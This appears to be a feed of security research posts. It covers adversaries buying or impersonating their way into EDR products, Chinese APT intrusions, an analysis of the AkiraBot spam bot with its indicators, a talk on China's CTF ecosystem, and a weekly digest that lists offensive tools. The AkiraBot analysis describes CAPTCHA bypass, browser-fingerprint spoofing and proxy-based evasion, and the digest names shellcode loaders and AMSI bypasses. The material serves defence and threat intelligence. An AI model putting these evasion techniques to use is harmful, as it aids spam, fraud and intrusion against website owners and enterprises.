Privileged access to administrative interfaces or agent installers for endpoint security products provides tangible advantages for adversaries seeking to advance their operations. Console access can be used to disable protections, manipulate configurations, or suppress detections. Direct, unmonitored access to the endpoint agent offers opportunities to test malware efficacy, explore bypass or tampering techniques, and suppress forensic visibility critical for investigations. In the wrong hands, these capabilities represent a significant threat to both the integrity of security products and the environments they protect.

This isn’t a new tactic. Various high-profile criminal groups have long specialized in social engineering campaigns to gain access to core security tools and infrastructure – ranging from EDR platforms (including SentinelOne and Microsoft Defender) to IAM and VPN providers such as Okta. Their goal: expand footholds, disable defenses, and obstruct detection long enough to profit.

Recent leaks related to Black Basta further underscore this trend. The group’s operators were observed testing across multiple endpoint security platforms – including SentinelOne, CrowdStrike, Carbon Black, and Palo Alto Networks – before launching attacks, suggesting a systematic effort to evaluate and evade security tools prior to deployment.

Black Basta leak excerpts

Economy/Ecosystem

There is an increasingly mature and active underground economy built around the buying, selling, and renting of access to enterprise security tools. For the right price, aspiring threat actors continually attempt to obtain time-bound or persistent access to our EDR platform and administrative consoles. Well-known cybercrime forums are filled with vendors openly advertising such access – and just as many buyers actively seeking it. This includes long-established forums like XSS[.]is, Exploit[.]in and RAMP.

That said, more of this activity has been moving to confidential messaging platforms as well (Telegram, Discord, Signal). For example, Telegram bots are used to automate trading this access, and Signal is often used by threat actors to discuss nuance, targeting and initial access operations.

This supply-and-demand dynamic is not only robust but also accelerating. Entire service offerings have emerged around this ecosystem, including "EDR Testing-as-a-Service," where actors can discreetly evaluate malware against various endpoint protection platforms.

Proposed Private EDR testing service

While these testing services may not grant direct access to full-featured EDR consoles or agents, they do provide attackers with semi-private environments to fine-tune malicious payloads without the threat of exposure – dramatically improving the odds of success in real-world attacks.

Prospective buyer for EDR installs

Access isn’t always bought, however. Threat actors frequently harvest legitimate credentials from infostealer logs – a common and low-cost method of acquiring privileged access to enterprise environments. In cases where existing customers reuse credentials, this can translate into a threat actor also gaining access to security tools. In more targeted operations, actors have also turned to bribery, offering significant sums to employees willing to sell out their account access.

These insider threats are not hypothetical. For instance, some groups have been observed offering upwards of $20,000 to employees at targeted companies in exchange for insider assistance – an approach openly discussed in the same dark web forums where compromised credentials and access are routinely traded.

On the defensive side, this requires constant monitoring and maintenance. Situational awareness has to be prioritized in order to maintain platform integrity and protect our legitimate customers. Our research teams are constantly monitoring for this style of abuse and access 'leakage', focusing on anomalous console access and site-token usage, and taking necessary actions to revoke these access vectors. This prohibits threat actors from fully interacting with the wider platform, and essentially orphans leaked agent installs, limiting the use of the agent in the hands of the threat actor.

Nitrogen – Threat Operators 'Leveling Up'

Some ransomware operations are now bypassing the underground market altogether – opting instead for more tailored, concentrated-effort impersonation campaigns to gain access to security tools. This approach is epitomized by the Nitrogen ransomware group.

Nitrogen is believed to be operated by a well-funded Russian national with ties to earlier groups like Maze and Snatch. Rather than purchasing illicit access, Nitrogen impersonates real companies – spinning up lookalike domains, spoofed email addresses, and cloned infrastructure to convincingly pose as legitimate businesses. Nitrogen then purchases official licenses for EDR and other security products under these false pretenses.

This kind of social engineering is executed with precision. Nitrogen typically targets small, lightly vetted resellers – keeping interactions minimal and relying on resellers’ inconsistent KYC (Know Your Customer) practices to slip through the cracks.

These impersonation tactics introduce a new layer of complexity for defenders. If a threat actor successfully acquires legitimate licenses from a real vendor, they can weaponize the product to test, evade, and potentially disable protections – without ever having to engage with criminal markets.

This highlights a growing challenge for the security industry: reseller diligence and KYC enforcement are clearly part of the threat surface. When those controls are weak or absent, adversaries like Nitrogen gain powerful new ways to elevate their campaigns – often at a lower cost and lower risk than the black market.

Lessons Learned and Internal Collaboration

One of the most impactful lessons from tracking adversaries targeting our platform has been the value of deep, early collaboration across internal teams – particularly those not traditionally pulled into threat response efforts. For example, by proactively engaging with our reseller operations and customer success teams, we can surface valuable signals on questionable license requests, reseller behavior anomalies, and business inconsistencies that could have otherwise gone unnoticed.

By creating shared playbooks, embedding lightweight threat context, and establishing clear escalation paths, reactive processes turn into proactive signal sources. Now, suspicious licensing activity – especially when paired with evasive behaviors or mismatched domain metadata – can surface much earlier in the workflow.

To scale this effort, we increasingly lean into automation. By codifying threat patterns – such as domain registration heuristics, behavioral metadata mismatches, and reseller inconsistencies – organizations can automate enrichment and risk-scoring for incoming licensing requests. This can then be used to dynamically filter, flag, and in some cases, auto-block high-risk activity before it reaches onboarding.

The growing trend of adversaries exploiting sales processes – whether through impersonation, social engineering, or brute-force credential use – means security vendors must treat every access vector, including commercial and operational pipelines, as part of the attack surface. Making cross-functional threat awareness standard operating procedure and integrating detection logic at the edge of business systems is essential.

We’re continuing to improve this work in quiet ways. And while we won’t share all of our detection logic here (for obvious reasons), we encourage others in the industry to pursue similar internal partnerships. Sales and support teams may already be seeing signs of abuse – security teams just need to give them the lens to recognize it.

Chinese State-Sponsored Adversaries

One notable set of activity, occurring over the previous months, involved reconnaissance attempts against SentinelOne’s infrastructure and specific high value organizations we defend. We first became aware of this threat cluster during a 2024 intrusion conducted against an organization previously providing hardware logistics services for SentinelOne employees. We refer to this cluster of activity as PurpleHaze, with technical overlaps to multiple publicly reported Chinese APTs.

The PurpleHaze Activity Cluster

Over the course of months, SentinelLABS observed the threat actor conduct many intrusions, including into an entity supporting a South Asian government by providing IT solutions and infrastructure across multiple sectors. This activity involved extensive infrastructure, some of which we associate with an operational relay box (ORB) network, and a Windows backdoor that we track as GoReShell. The backdoor is implemented in the Go programming language and uses functionalities from the open-source reverse_ssh tool to establish reverse SSH connections to attacker-controlled endpoints.

SentinelLABS collectively tracks these activities under the PurpleHaze moniker. We assess with high confidence that PurpleHaze is a China-nexus actor, loosely linking it to APT15 (also known as Nylon Typhoon, among various other, now outdated, aliases). This adversary is known for its global targeting of critical infrastructure sectors, such as telecommunications, information technology, and government organizations – victimology that aligns with our multiple encounters with PurpleHaze.

We track the ORB network infrastructure observed in the attack against the South Asian government organization as being operated from China and actively used by several suspected Chinese cyberespionage actors, including APT15. The use of ORB networks is a growing trend among these threat groups, since they can be rapidly expanded to create a dynamic and evolving infrastructure that makes tracking cyberespionage operations and their attribution challenging. Additionally, GoReShell malware and its variations, including its deployment mechanism on compromised machines and obfuscation techniques, have been exclusively observed in intrusions that we attribute with high confidence to China-nexus actors.

ShadowPad Intrusions

In June 2024, approximately four months prior to PurpleHaze targeting SentinelOne, SentinelLABS observed threat actor activity targeting the same South Asian government entity that was also targeted in October 2024. Among the retrieved artifacts, we identified samples of ShadowPad, a modular backdoor platform used by multiple suspected China-nexus threat actors to conduct cyberespionage. Recent ShadowPad activity has also included the deployment of ransomware, though the motive remains unclear – whether for financial gain or as a means of distraction, misattribution, or removal of evidence.

The ShadowPad samples we retrieved were obfuscated using ScatterBrain, an evolution of the ScatterBee obfuscation mechanism. Our industry partner, Google Threat Intelligence Group (GTIG), has also observed the use of ScatterBrain-obfuscated ShadowPad samples since 2022 and attributes them to clusters associated with the suspected Chinese APT actor, APT41.

GTIG APT41 Use of ScatterBrain

Investigations continue into the specific actor overlap between the June 2024 ShadowPad intrusions and the later PurpleHaze activity. We do not rule out the involvement of the same threat cluster, particularly given the extensive sharing of malware, infrastructure, and operational practices among Chinese threat groups, as well as the possibility of access transfer between different actors.

Based on private telemetry, we identified a large collection of victim organizations compromised using ScatterBrain-obfuscated ShadowPad. Between July 2024 and March 2025, this malware was used in intrusions at over 70 organizations across various regions globally, spanning sectors such as manufacturing, government, finance, telecommunications, and research. We assess that the threat actor primarily gained initial foothold in the majority of these organizations by exploiting an n-day vulnerability in CheckPoint gateway devices, which aligns with previous research on ShadowPad intrusions involving the deployment of ransomware.

Among the victims, we identified the previously mentioned IT services and logistics organization that was at the time responsible for managing hardware logistics for SentinelOne employees. Victim organizations were promptly informed of intrusion specifics, which were swiftly investigated. At this point, it remains unclear whether the perpetrators’ focus was solely on the compromised organization or if they intended to extend their reach to client organizations as well.

A detailed investigation into SentinelOne’s infrastructure, software, and hardware assets found no evidence of secondary compromise. Nevertheless, this case underscores the fragility of the larger supplier ecosystem that organizations depend upon and the persistent threat posed by suspected Chinese threat actors, who continuously seek to establish strategic footholds to potentially compromise downstream entities.

SentinelLABS will share a detailed public release on this topic in due course, providing further technical information on these activities, including observed TTPs, malware, and infrastructure.

Lessons Learned While Hardening Our Operational Ecosystem

Our analysis of the PurpleHaze cluster, and more specifically the potential indirect risk introduced via compromised third-party service providers, has reinforced several key insights around operational security and supply chain monitoring. Even when our own infrastructure remained untouched, the targeting of an external service provider previously associated with business logistics surfaced important considerations.

One immediate reminder is the necessity of maintaining real-time awareness not only over internal assets but also over adjacent service providersβ€”particularly those with past or current access to sensitive employee devices or logistical information. When incidents occur near your supply chain, don’t wait for confirmation of compromise. Proactively trigger internal reviews of asset inventories, procurement workflows, OS images and onboarding deployment scripts, and segmentation policies to quickly identify any exposure pathways and reduce downstream risk.

This leads to several defense recommendations:

  • Distribute Threat Intelligence Across Operational Stakeholders
    Organizations should proactively share campaign-level threat intelligence with business units beyond the traditional security org – particularly those managing vendor relationships, logistics, and physical operations. Doing so enables faster detection of overlap with compromised third parties and supports early reassessment of exposure through external partners.
  • Integrate Threat Context Into Asset Attribution Workflows
    Infrastructure and IT teams should collaborate with threat intelligence functions to embed threat-aware metadata into asset inventories. This enables more responsive scoping during incident response and enhances the ability to trace supply chain touchpoints that may be at risk.
  • Expand Supply Chain Threat Modeling
    Organizations should refine their threat modeling processes to explicitly account for upstream supply chain threats, especially those posed by nation-state actors with a history of leveraging contractors, vendors, or logistics partners as indirect access vectors. Tailoring models to include adversary-specific tradecraft enables earlier identification of unconventional intrusion pathways.

While attribution continues to evolve and victim impact remains diverse, one thing is clear: well-resourced threat actors are increasingly leaning on indirect routes into enterprise environments. Investigations like this help us sharpen our defenses – not just around traditional digital perimeters but around the full operational footprint of our organization.

The Strategic Value of Cyber Threat Intelligence

In today’s threat landscape, threat intelligence has evolved from a niche function into an essential pillar of enterprise defense – particularly for private sector organizations operating in the security space. As threat actors increasingly target security vendors for insider access, abuse of legitimate channels, and supply chain infiltration, the role of CTI in anticipating and disrupting these tactics has become more critical than ever.

One of the most tangible examples of this value is in internal talent acquisition and insider threat defense. Intelligence has become a frontline asset in identifying attempts by North Korean IT workers and other state-backed operatives to embed themselves in organizations under false pretenses. By flagging suspicious applicant patterns, cross-referencing alias histories, and tracking known tradecraft, CTI teams help hiring managers and HR avoid potential insider incidents before they start.

Our CTI capabilities must also directly support sales and channel operations. As criminal groups increasingly impersonate legitimate businesses to acquire security products through trusted resellers, intelligence plays a key role in verifying customer legitimacy and identifying anomalous purchase behaviors. By integrating intelligence insights into pre-sale vetting workflows, we add a crucial layer of protection that helps ensure adversaries cannot simply "buy" their way into our technology stack.

Internally, threat intelligence informs and enhances how we defend our own technology and supply chain against highly targeted APT activity. From understanding how adversaries reverse-engineer our software to uncovering which parts of our technology stack they seek to compromise, CTI enables proactive hardening, smarter telemetry prioritization, and meaningful collaboration with product and engineering teams. In essence, intelligence acts as an early-warning system and a strategic guide – ensuring our defenses stay one step ahead of evolving threats.

Across every function – whether it’s HR, Sales, Engineering, or Security – cyber threat intelligence is no longer a backroom function. It’s embedded in the fabric of how we defend, operate, and grow as a business.

AkiraBot | AI-Powered Bot Bypasses CAPTCHAs, Spams Websites At Scale

9 April 2025 at 15:00

Executive Summary

  • AkiraBot is a framework used to spam website chats and contact forms en masse to promote a low-quality SEO service.
  • SentinelLABS assesses that AkiraBot has targeted more than 400,000 websites and successfully spammed at least 80,000 websites since September 2024.
  • The bot uses OpenAI to generate custom outreach messages based on the purpose of the website.
  • The framework is modular and sophisticated compared to typical spam tools, employing multiple CAPTCHA bypass mechanisms & network detection evasion techniques.

Overview

Whenever a new form of digital communications becomes prevalent, actors inevitably adopt it for spam to try to profit from unsuspecting users. Email has been the perennial choice for spam delivery, but the prevalence of new communications platforms has expanded the spam attack surface considerably.

This report explores AkiraBot, a Python framework that targets small to medium sized business website contact forms and chat widgets. AkiraBot is designed to post AI-generated spam messages tailored to the targeted website’s content that shill the services for a dubious Search Engine Optimization (SEO) network. The use of LLM-generated content likely helps these messages bypass spam filters, as the spam content is different each time a message is generated. The framework also rotates which attacker-controlled domain is supplied in the messages, further complicating spam filtering efforts.

The bot creator has invested significant effort into evading CAPTCHA filters as well as avoiding network detections by relying on a proxy service generally marketed towards advertisers – though the service has seen considerable interest and use from cybercriminal actors.

AkiraBot is not related to the ransomware group Akira; this name was chosen due to the bot’s consistent use of domains that use "Akira" as the SEO service brand.

Script Execution and Website Feature Targeting

SentinelLABS identified several archives containing scripts related to this framework with file timestamps dating back to September 2024. The oldest archive refers to the bot as Shopbot, likely a reference to its targeting of websites using Shopify. As the tool evolved, the targeting expanded to include websites built using GoDaddy and Wix, as well as generic website contact forms, which includes websites built using Squarespace, and likely other technologies. These technologies are primarily used by small- to medium-sized businesses for their ease in enabling website development with integrations for eCommerce, website content management, and business service offerings.

There are many versions of this tool, with file timestamps in the archives indicating activity from September 2024 to the present. Each version uses one of two hardcoded OpenAI API keys and the same proxy credentials and test sites, which links the archives despite the disparate naming conventions. We identified AkiraBot-related archives that had the following root directory names:

  • bubble_working_clone
  • fingerprints-server
  • GoDaddy
  • NextCaptcha and FastCaptcha
  • NextCaptchaBot-v6
  • override
  • petar_bot
  • shopbotpyv2
  • SHOPIFY_SYSTEM_UPDATED
  • updatedpybot
  • wix
  • wixbot
  • WORKING_FOLDER

Additionally, logs from the tool reveal that the operator ran it from the following paths, suggesting that they are most likely using Windows Server systems based on the Administrator username being the most prevalent:

 	C:/Users/Administrator/Desktop/
 	C:/Users/Administrator/Downloads/
 	C:/Users/Usuario/Desktop/ - only appears in the archive named GoDaddy

Originally, AkiraBot spammed website contact forms enticing the site owner to purchase SEO services. Newer versions of AkiraBot have also targeted the Live Chat widgets integrated into many websites, including Reamaze widgets.

_submit_old_website function in v14.py

The bot has a GUI that shows success metrics and lets the operator choose a target list to run against. The GUI lets the operator customize how many threads are running at once, a feature the bot uses to target many sites concurrently.

AkiraBot GUI

Spam Message Generation

Searching for websites referencing AkiraBot domains shows that the bot previously spammed websites in such a way that the messages were indexed by search engines.

Google search results containing useakira[.]com
Spam comment on website from 2023 and content from AkiraBot templates.txt file

AkiraBot creates custom spam messages for targeted websites by processing a template that contains a generic outline of the type of message the bot should send.

Spam message template

The template is processed by a prompt sent to the OpenAI chat API to generate a customized outreach message based on the contents of the website. The OpenAI client uses the model gpt-4o-mini and is assigned the system role "You are a helpful assistant that generates marketing messages." The prompt instructs the LLM to replace the variables <WEBSITE_NAME> and <KEYWORD> with the site name provided at runtime.
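
For context, the general shape of such a Chat Completions request (a generic illustration of the API pattern described above, not the bot's actual code; the user message content is a placeholder) looks like this:

# Generic illustration of the OpenAI Chat Completions call pattern described above.
curl https://api.openai.com/v1/chat/completions \
  -H "Authorization: Bearer $OPENAI_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
        "model": "gpt-4o-mini",
        "messages": [
          {"role": "system", "content": "You are a helpful assistant that generates marketing messages."},
          {"role": "user", "content": "<template with WEBSITE_NAME and KEYWORD filled in at runtime>"}
        ]
      }'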

AI Chat prompt from v10.py

The <KEYWORD> is generated by processing the {context} variable, which contains text scraped from the targeted website via BeautifulSoup, a library that parses raw HTML code into human- (or LLM-) readable text.

AkiraBot’s generate_message function

The resulting message includes a brief description of the targeted website, making the message seem curated. The benefit of generating each message using an LLM is that the message content is unique and filtering against spam becomes more difficult compared to using a consistent message template which can trivially be filtered.

Logged AI-generated outreach messages in submissions.csv

CAPTCHA Bypass & Network Evasion Techniques

CAPTCHA Bypass

AkiraBot puts significant emphasis on evading CAPTCHAs so that it can spam websites at scale. The targeted CAPTCHA services include hCAPTCHA and reCAPTCHA, and certain versions of the tool also target Cloudflare’s hCAPTCHA service.

We identified an archive with files for CAPTCHA-related servers and browser fingerprints, which allow the bot’s web traffic to mimic a legitimate end user. The archives contain a fingerprint server that runs on the same system as the other AkiraBot tools and intercepts the website loading processes using Selenium WebDriver, an automation framework that simulates user browsing activity.

The inject.js script injects code into the targeted website’s Document Object Model (DOM), which enables the tool to modify how the website loads in real time and change its behavior. inject.js manipulates values in the session via a headless Chrome instance, making the session appear to the webserver like an end user’s browser. The script modifies multiple browser attributes that webservers use to identify the nature of the browser viewing the website, including:

  • Audio Context and Voice engines, which are used to profile whether a session is headless or a real browser
  • Graphics rendering, including canvas and WebGL attributes
  • Installed fonts
  • Navigator objects, which provide a wealth of profiling information, such as browser type, operating system & architecture, geolocation, hardware details, languages installed, and browser privacy settings
  • System memory, storage, and CPU profile
  • Timezone

The bot uses several CAPTCHA bypassing services, including Capsolver, FastCaptcha, and NextCaptcha, which are failover services for when browser emulation is insufficient to interact with the targeted website.

FastCaptcha token generator function in v10.py

AkiraBot also runs a headless Chrome instance to refresh values for Reamaze tokens periodically. Reamaze provides websites with customer support chat integrations, making this another targeted feature. The service also offers spam filters for chats on its platform, indicating that this is a known vector for spam attacks.

Reamaze token handling function

Network Evasion Techniques

AkiraBot uses many different proxy hosts to evade network detections and diversify the source of where its traffic comes from. In each archive SentinelLABS analyzed, AkiraBot used the SmartProxy service. SmartProxy’s website claims that its proxies are ethically sourced and that they provide data center, mobile, and residential proxies. Each version of the bot uses the same proxy credentials, suggesting the same actor is behind each iteration.

get_random_proxy function in The_NextCaptcha_Bot.py

While SmartProxy is a service that seems to operate within legal boundaries, it is worth noting that it has regularly had the attention of cybercriminals. The BlackBasta ransomware leaks referenced an exchange of SmartProxy credentials, for example.

SmartProxy credentials from BlackBasta leaks

Logging & Success

AkiraBot logs its spam progress to submissions.csv, which sometimes includes the AI-generated spam message contents as well. The submissions.csv file from the January 2025 archives shows more than 80,000 unique domains that were successfully spammed. The script also logs failed attempts in failed.txt and failed_old.txt. The January 2025 archives showed that only 11,000 domains had failed, including from previous runs of the tool. We analyzed all submissions.csv files; deduplicating the results revealed that more than 420,000 unique domains were targeted in total.
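
As a rough sketch of that kind of analysis (assuming the targeted domain is the first comma-separated column of each submissions.csv, which is an assumption about the file layout), the deduplication can be done with standard tools:

# Count unique spammed domains across all recovered submissions.csv files.
cat */submissions.csv | cut -d, -f1 | sort -u | wc -l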

Two versions of AkiraBot used a Telegram bot for logging success metrics. The scripts monitor.py and monitor_random.py would collect success metrics from the bot and post them to a Telegram channel via API.

Telegram sending functionality in monitor.py

Telegram Detail

The Telegram functionality, contained in the monitor.py and monitor_random.py scripts, is tied into the proxy rotation and CAPTCHA defeat features implemented in the bundled JavaScript file script.js. The monitor.py script utilizes pyautogui to paste the contents of script.js into a browser developer console by scripting CTRL+SHIFT+J, followed by the paste command, eventually executing the JavaScript within the browser console.

pyautogui actions in monitor.py

The pasted and executed JavaScript is then responsible for attempting CAPTCHA refreshes and defeats on targeted URLs, reporting the status returned to a JSON file, stats.json. If a proxy rotation is required to aid further in refreshing the CAPTCHA defeat attempts on a given URL, the monitor.py script handles this as well, rotating the proxy in use through the iproxyonline service (fxdx[.]in).

Proxy rotation is generally enabled to avoid geographic or IP-based restrictions when repeatedly attempting to refresh and defeat CAPTCHAs. The Telegram status updates specifically report on proxy rotations and CAPTCHA submissions. Some versions of these scripts have the proxy rotation section commented out, indicating that it is an optional feature.

Telegram message submission + proxy rotation status in monitor.py

All of the analyzed monitor.py and monitor_random.py scripts contain the same Telegram token and chat_id combination.

Telegram bot data in monitor.py

This Telegram chat_id is associated with the following Telegram user data:

(bot) username: htscasdasdadwoobot
Firstname: Shadow / hts
LastName: a_zarkawi
HTS Telegram bot referenced in monitor.py scripts

Infrastructure

The spam messages frequently rotate the domain used, likely in an attempt to avoid detection. The oldest domain in use is akirateam[.]com, which was registered in January 2022 on a Germany-based IP, 91.195.240[.]94, without further updates until March 2023. The second oldest domain is goservicewrap[.]com, which was registered in April 2024 and resolved to 86.38.202[.]110, a Hostinger IP in Cyprus.

Several AkiraBot domains have interesting connections through historical DNS activity. The subdomain mail.servicewrap-go[.]com briefly shared a CNAME record pointing to 77980.bodis[.]com, which is associated with various malicious activities, including a 2023 malvertising campaign. This domain also received communications from several Windows executable files that were detected as various banking trojans.

An odd relationship stood out in anchor links referencing 77980.bodis[.]com: from December 2024 through February 2025, the website unj[.]digital contained anchor links pointing to 77980.bodis[.]com. UNJ Digital's website describes itself as a digital marketing and software development firm. The subdomain smtp.unj[.]digital also has a CNAME record pointing to 77980.bodis[.]com, reinforcing the connection between these hosts. While the website now highlights digital content services, as of late 2024 the site showed a focus on increasing marketing revenue.

Screenshot of content on unj[.]digital circa October 2024
Screenshot of content on unj[.]digital circa March 2025

Akira and ServiceWrap SEO

AkiraBot's SEO-offering domains follow two distinct naming themes: Akira and ServiceWrap. Reviews for both services on Trustpilot are similar: many 5-star reviews with similar, potentially AI-generated contents, and the occasional 1-star review complaining that the site is either a scam or has spammed the person leaving the review.

The 5-star reviews tend to follow a pattern where the reviewer has one previous review that was made 1-5 days before the Akira or ServiceWrap review. The review themes are very similar across these 5-star reviews, though the contents and structure are always unique. We believe the actor may be generating some fake reviews, though it is difficult to say with certainty.

Trustpilot review for servicewrapgo[.]com

Trustpilot review for useakira[.]com

Trustpilot review for useakira[.]com

Conclusion

AkiraBot is a sprawling framework that has undergone multiple iterations to support new targeted website technologies and evade website defenses. We expect this campaign to continue to evolve as website hosting providers adapt their defenses to deter spam. The author or authors have invested significant effort in this bot's ability to bypass commonly used CAPTCHA technologies, which demonstrates that the operators are motivated to violate service provider protections.

AkiraBot's use of LLM-generated spam message content demonstrates the emerging challenges that AI poses to defending websites against spam attacks. The easiest indicators to block are the rotating set of domains used to sell the Akira and ServiceWrap SEO offerings, as the spam message contents no longer follow a consistent pattern, as they did in previous campaigns selling the services of these firms.

SentinelLABS thanks the OpenAI security team for their collaboration and continued efforts in deterring bad actors from abusing their services. The OpenAI team shared the following statement after their investigation:

"We're grateful to SentinelOne for sharing their research. Distributing output from our services for spam is against our policies. The API key involved is disabled, and we're continuing to investigate and will disable any associated assets. We take misuse seriously and are continually improving our systems to detect abuse."

Indicators of Compromise

Akira & ServiceWrap Domains
akirateam[.]com
beservicewrap[.]pro
firstpageprofs[.]com
getkira[.]info
go-servicewrap[.]com
gogoservicewrap[.]com
goservicewrap[.]com
joinnowkira[.]org
joinnowservicewraps[.]pro
joinservicewrap[.]com
joinuseakira[.]com
kiraone[.]info
letsgetcustomers[.]com
loveservice-wrap[.]com
mybkira[.]info
onlyforyoursite[.]com
searchengineboosters[.]com
service-wrap[.]com
servicewrap-go[.]com
servicewrap[.]pro
servicewrapgo[.]com
servicewrapone[.]com
theakirateam[.]com
toakira[.]pro
topservice-wrap[.]pro
topservicewrap[.]com
usekiara[.]com
useproakira[.]com
usethatakira[.]com
wantkiara[.]info
wearetherealpros[.]com
wejoinkir[.]vip
wethekira[.]shop
wetheservicewrap[.]pro

AkiraBot Tool Archive SHA-1
09ec44b6d3555a0397142b4308825483b479bf5a
0de065d58b367ffb28ce53bc1dc023f95a6d0b89
13de9fcd4e7c36d32594924975b7ef2b91614556
2322964ea57312747ae9d1e918811201a0c86e9c
253684ea43cb0456a6fec5728e1091ff8fcb27cf
36b4e424ce8082d7606bb9f677f97c0f594f254d
3a443c72995254400da30fe203f3fbf287629969
3a7cc815b921166006f31c1065dadfeb8d5190e6
4d24dd5c166fa471554ed781180e353e6b9642b7
51ec20e5356bbebd43c03faae56fca4c3bbe318e
55affc664472c4657c8534e0508636394eac8828
5620b527dfc71e2ee7efb2e22a0441b60fd67b84
5fde3180373c420cfa5cfdea7f227a1e1fe6936c
62e66bae4b892593009d5261d898356b6d0be3ef
6b65c296d9e1cda5af2f7dab94ce8e163b2a4ca8
6c56b986893dd1de83151510f4b6260613c5fbb9
6f342ff77cd43921210d144a403b8abb1e541a8b
7129194c63ae262c814da8045879aed7a037f196
71464c4f145c9a43ade999d385a9260aabcbf66d
730192b0f62e37d4d57bae9ff14ec8671fbf051e
769aa6ab69154ca87ccba0535e0180a985c21a0c
76aab3ab0f3f16cf30d7913ff767f67a116ff1e7
853fde052316be7887474996538b31f6ac0c3963
9d43494c6f87414c67533cce5ec86754311631fc
9f6ed2427e959e92eb1699024f457d87fa7b5279
aa72065673dc543e6bf627c7479bfe8a5e42a9c4
aac26242f4209bc59c82c8f223fcf2f152ce44bc
b643a1f2c4eb436db26763d5e2527f6bebe8bcbf
bbd754e36aee4702b9f20b90d509248945add4ea
cb194612ed003eaf8d8cf6ed3731f21f3edeb161
cc63ee921c29f47612096c34d6ee3ef244b33db2
e12c6911997d7c2af5550b7e989f1dc57b6733b8
eae675812c4274502051d6f2d36348f77a8464a0
f1c7c5d0870fd0abb7e419f2c2ba8df42fa74667
f2e71c9cbc4a18482a11ca3f54f2c958973360b4
fb7fdcc2fe11e95065a0ce9041348984427ca0f4

LABScon24 Replay | A Walking Red Flag (With Yellow Stars)

31 March 2025 at 13:00

APT40 used CTFs at Hainan University to recruit hackers and source software vulnerabilities for operations. Jiangsu MSS received vulnerabilities from the Tianfu Cup. iSoon hosted their own CTF before their files were leaked on GitHub. Chinese intelligence cutouts tried to pitch US participants at RealWorldCTF. The list goes on.

A diverse ecosystem of CTFs exists in China, and it has, until now, been largely ignored. Since 2017, when the PRC government issued rules to bolster cybersecurity competitions, incorporate them into talent cultivation and training programs, and limit the amount of money to be paid out in rewards, China's security ecosystem has launched more than 150 unique competitions. Including competitions that are held annually, the number of events since 2017 exceeds 400.

Not all these competitions are software vulnerability competitions like Tianfu Cup; in fact, few are. Most are aimed at talent cultivation and recruiting, and many are hosted by the military, the intelligence services, or other arms of the state.

This talk explores the diversity of China's CTF ecosystem, its major leagues and events, and the annual number of participants across society. It highlights competitions held expressly by the Ministry of State Security and the PLA, delving into those competitions' particulars. Defenders with appropriate CTI collection capabilities will better understand how to target their collection efforts on specific individuals in China.

About the Authors

Dakota Cary is a strategic advisory consultant at SentinelOne. His reports examine artificial intelligence and cybersecurity research at Chinese universities, the People's Liberation Army's efforts to automate software vulnerability discovery, and new policies to improve China's cybersecurity-talent pipeline. Prior to SentinelOne, he was a research analyst at Georgetown University's Center for Security and Emerging Technology on the CyberAI Project.

Eugenio Benincasa is a Senior Cyberdefense Researcher at the Center for Security Studies (CSS) at ETH Zurich. Prior to joining CSS, Eugenio worked as a Threat Analyst at the Italian Presidency of the Council of Ministers in Rome and as a Research Fellow at the think tank Pacific Forum in Honolulu, where he focused on cybersecurity issues. He also worked as a Crime Analyst at the New York City Police Department (NYPD).

About LABScon

This presentation was featured live at LABScon 2024, an immersive 3-day conference bringing together the world's top cybersecurity minds, hosted by SentinelOne's research arm, SentinelLABS.

Keep up with all the latest on LABScon 2025 here.

Last Week in Security (LWiS) - 2025-04-21

By:Erik
22 April 2025 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2025-04-14 to 2025-04-21.

News

  • [PDF] Disclosure of Cyber Security Breach and Data Exfiltration through DOGE Systems and Whistleblower/Witness Intimidation - A senior DevSecOps Engineer at the National Labor Relations Board ("NLRB") details what he saw as DOGE was granted access to NLRB systems. The evidence looks damning: whoever performed these actions had high privileges, exfiltrated a lot of data, and, besides disabling logging, was pretty sloppy (smash and grab vs stealth). The use of correct credentials for a DOGE account from Russia (blocked by geo-rules) just 15 minutes after the account was created is very strange. If we assume Russia has an active implant that pulled the credentials from the DOGE employee who created the account, or that the credentials were otherwise sent to Russia, why would they attempt to use them from Russia? The mix of high-level and amateur tradecraft doesn't make sense, but it wouldn't be the first time a Russian cyber actor forgot to turn on their VPN; it does happen. For a more editorialized version of the story, see: A whistleblower's disclosure details how DOGE may have taken sensitive labor data.
  • CISA extends funding to ensure 'no lapse in critical CVE services' - MITRE, a non-profit federally funded research and development center, created and has maintained the Common Vulnerabilities and Exposures (CVE) database for 25 years. They sent a letter on 2025-04-15 stating that their funding would expire the next day. This is highly unusual, as contractors whose "option periods" (additional contract years) are not going to be funded are normally notified well in advance. As the letter was making headlines, late on the night of the 15th CISA apparently "executed the option period" (funded at least one additional year). While technically you can wait until midnight of the day the contract expires to extend it, it's highly unusual. If MITRE hadn't sent the letter that caused headlines, would the funding have come? Either way, there is now a new CVE Foundation that may be able to take over if MITRE does lose funding.
  • La Liga: Blocking of Cloudflare IPs in Spain - The Spanish La Liga football league blocked Cloudflare IPs to prevent Spanish citizens from streaming football matches. The issue is that over 20% of the internet sits behind Cloudflare, so blocking all of Cloudflare's IPs took down a good chunk of the internet for Spain during football matches. This is a good reminder of why technically competent advisors are needed for government agencies and enforcement. Cloudflare is taking legal action to stop the blocking.

Techniques and Write-ups

Tools and Exploits

  • VECTR - A service container for Mythic C2 for interacting with SRA's VECTR.
  • waiting_thread_hijacking - Waiting Thread Hijacking - injection by overwriting the return address of a waiting thread.
  • koneko - Robust Cobalt Strike shellcode loader with multiple advanced evasion features.
  • FriendlyFireBOF - A BOF that suspends non-GUI threads for a target process or resumes them resulting in stealthy process silencing.
  • SourcePoint v4.0 - The popular C2 profile generator for Cobalt Strike has been updated to support the latest Cobalt Strike features.
  • bincrypter - Pack/Encrypt/Obfuscate ELF + SHELL scripts.
  • After days of struggle, my emulator now runs in the browser - web assembly is getting wild. Source: emulator.
  • go-buena-clr - Good CLR Host with Native patchless AMSI Bypass.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • trufflehog-explorer - a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog.
  • dAWShund - Putting a leash on naughty AWS permissions.
  • cloud-snitch - Easy-to-use map visualization for AWS activity, inspired by Little Snitch for macOS.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

Last Week in Security (LWiS) - 2025-04-14

By:Erik
15 April 2025 at 03:59

